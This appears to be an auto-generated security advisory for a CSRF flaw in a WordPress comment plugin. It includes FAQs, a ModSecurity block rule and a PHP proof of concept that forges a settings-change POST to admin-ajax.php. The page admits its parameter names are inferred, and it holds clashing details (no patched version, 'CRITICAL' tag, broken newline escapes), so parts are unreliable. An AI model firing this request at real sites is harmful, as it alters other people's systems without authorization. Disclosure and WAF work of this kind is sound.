What is CVE-2026-9730?

CVE-2026-9730 is a Cross-Site Request Forgery (CSRF) vulnerability in the Remove NoFollow Commenter URL plugin for WordPress, specifically in version 1.0. The vulnerability allows unauthenticated attackers to modify the plugin’s comment-display settings by tricking a site administrator into performing an action.

How does the vulnerability work?

The vulnerability arises from missing or incorrect nonce validation in the gmz_comment_settings_save function. This allows an attacker to send a forged request to the WordPress admin-ajax.php endpoint, changing settings without proper authorization.

Who is affected by this vulnerability?

Any WordPress site using the Remove NoFollow Commenter URL plugin version 1.0 is affected. Administrators of these sites should verify the plugin version to determine if they are at risk.

How can I check if my site is vulnerable?

Check the version of the Remove NoFollow Commenter URL plugin installed on your WordPress site. If it is version 1.0 or earlier, your site is vulnerable to CVE-2026-9730.

What are the practical risks of this vulnerability?

The vulnerability has a medium severity with a CVSS score of 4.3, indicating that while it does not allow data exposure or privilege escalation, it can lead to unauthorized changes in comment-display settings, potentially facilitating social engineering attacks.

How can I fix or mitigate this issue?

To mitigate this vulnerability, update the Remove NoFollow Commenter URL plugin to the latest version. Additionally, implement nonce verification in the gmz_comment_settings_save function to ensure that only authorized requests can modify settings.

What is nonce verification?

Nonce verification is a security measure in WordPress that ensures requests made to perform actions are intentional and originate from authenticated users. It prevents CSRF attacks by validating a unique token (nonce) included in requests.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can craft a POST request to the vulnerable AJAX action without nonce verification. It illustrates how an attacker can modify the comment-display setting by tricking an administrator into executing the request.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Remove NoFollow Commenter URL plugin until a patch is applied. Additionally, monitor user activity and educate administrators about the risks of clicking on untrusted links.

What is the CVSS score and what does it indicate?

The CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that should be addressed promptly to avoid potential exploitation.

Are there any additional security practices to follow?

In addition to updating plugins, regularly review user permissions, implement strong access controls, and educate users about security best practices to minimize the risk of CSRF and other vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 2, 2026

CVE-2026-9730: Remove NoFollow Commenter URL <= 1.0 Cross-Site Request Forgery to Settings Update PoC, Patch Analysis & Rule

CVE ID CVE-2026-9730

Plugin remove-nofollow-commenter-link

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 1.0

Patched Version —

Disclosed May 31, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-9730 (metadata-based): This vulnerability affects the Remove NoFollow Commenter URL plugin for WordPress, version 1.0. It is a Cross-Site Request Forgery (CSRF) issue with a CVSS score of 4.3, allowing unauthenticated attackers to modify the plugin’s comment-display setting by tricking a site administrator into performing an action.

The root cause is missing or incorrect nonce validation on the gmz_comment_settings_save function. In WordPress, admin actions typically require a nonce to verify that requests are intentional from the administrator. Without this nonce check, the function accepts any POST request, regardless of origin. This inference is based on the CWE classification (CWE-352) and the vulnerability description. No code diff is available to confirm the exact implementation.

Exploitation requires an attacker to craft a forged request targeting the plugin’s settings save handler. The likely endpoint is a WordPress admin-ajax.php action with the action parameter set to gmz_comment_settings_save or a similar handler. The attacker would embed a malicious HTML form or image tag in an external site, which, when visited by a logged-in administrator, submits the request and changes the plugin settings. The payload would include parameters such as ‘comment_display’ or similar setting field names.

Remediation involves adding a nonce verification check to the gmz_comment_settings_save function using WordPress’s check_ajax_referer() or wp_verify_nonce() functions. Plugins should validate the nonce before processing any state-changing requests. Additionally, capability checks should ensure the user has administrative privileges.

The impact is limited to integrity impact: an attacker can change the plugin’s comment-display setting (e.g., hiding or showing commenter URLs). This could be used as part of a broader social engineering attack but does not directly expose data or allow privilege escalation.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-9730 (metadata-based)
# Blocks CSRF exploitation of the Remove NoFollow Commenter URL plugin settings save handler
# Blocks POST requests to admin-ajax.php with the vulnerable action parameter
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20269730,phase:2,deny,status:403,chain,msg:'CVE-2026-9730: Remove NoFollow Commenter URL plugin CSRF (metadata-based)',severity:'CRITICAL',tag:'CVE-2026-9730'"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule ARGS_POST:action "@streq gmz_comment_settings_save" 
      "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9730 - Remove NoFollow Commenter URL <= 1.0 - Cross-Site Request Forgery to Settings Update

// Configuration: set the target WordPress site URL
$target_url = 'http://example.com'; // CHANGE THIS

// The vulnerable AJAX action (inferred from plugin slug and description)
$ajax_action = 'gmz_comment_settings_save';
// Inferred parameter name for the comment display setting (commonly named 'comment_display' or similar)
$setting_value = '1'; // 1 = enable display, 0 = disable, adjust as needed

// Construct the POST data (nonce is not required due to missing verification)
$post_data = array(
    'action' => $ajax_action,
    'comment_display' => $setting_value
);

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // for testing with self-signed SSL

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Display results
echo "HTTP Status Code: " . $http_code . "n";
echo "Response body: " . $response . "n";
?>

Frequently Asked Questions

What is CVE-2026-9730?
Understanding the vulnerability
CVE-2026-9730 is a Cross-Site Request Forgery (CSRF) vulnerability in the Remove NoFollow Commenter URL plugin for WordPress, specifically in version 1.0. The vulnerability allows unauthenticated attackers to modify the plugin’s comment-display settings by tricking a site administrator into performing an action.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from missing or incorrect nonce validation in the gmz_comment_settings_save function. This allows an attacker to send a forged request to the WordPress admin-ajax.php endpoint, changing settings without proper authorization.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the Remove NoFollow Commenter URL plugin version 1.0 is affected. Administrators of these sites should verify the plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
Check the version of the Remove NoFollow Commenter URL plugin installed on your WordPress site. If it is version 1.0 or earlier, your site is vulnerable to CVE-2026-9730.
What are the practical risks of this vulnerability?
Evaluating the impact
The vulnerability has a medium severity with a CVSS score of 4.3, indicating that while it does not allow data exposure or privilege escalation, it can lead to unauthorized changes in comment-display settings, potentially facilitating social engineering attacks.
How can I fix or mitigate this issue?
Recommended remediation steps
To mitigate this vulnerability, update the Remove NoFollow Commenter URL plugin to the latest version. Additionally, implement nonce verification in the gmz_comment_settings_save function to ensure that only authorized requests can modify settings.
What is nonce verification?
Understanding nonce in WordPress
Nonce verification is a security measure in WordPress that ensures requests made to perform actions are intentional and originate from authenticated users. It prevents CSRF attacks by validating a unique token (nonce) included in requests.
How does the proof of concept demonstrate the vulnerability?
Explaining the PoC code
The proof of concept shows how an attacker can craft a POST request to the vulnerable AJAX action without nonce verification. It illustrates how an attacker can modify the comment-display setting by tricking an administrator into executing the request.
What should I do if I cannot update the plugin immediately?
Interim measures
If immediate updates are not possible, consider disabling the Remove NoFollow Commenter URL plugin until a patch is applied. Additionally, monitor user activity and educate administrators about the risks of clicking on untrusted links.
What is the CVSS score and what does it indicate?
Understanding CVSS scoring
The CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that should be addressed promptly to avoid potential exploitation.
Are there any additional security practices to follow?
Enhancing overall security
In addition to updating plugins, regularly review user permissions, implement strong access controls, and educate users about security best practices to minimize the risk of CSRF and other vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations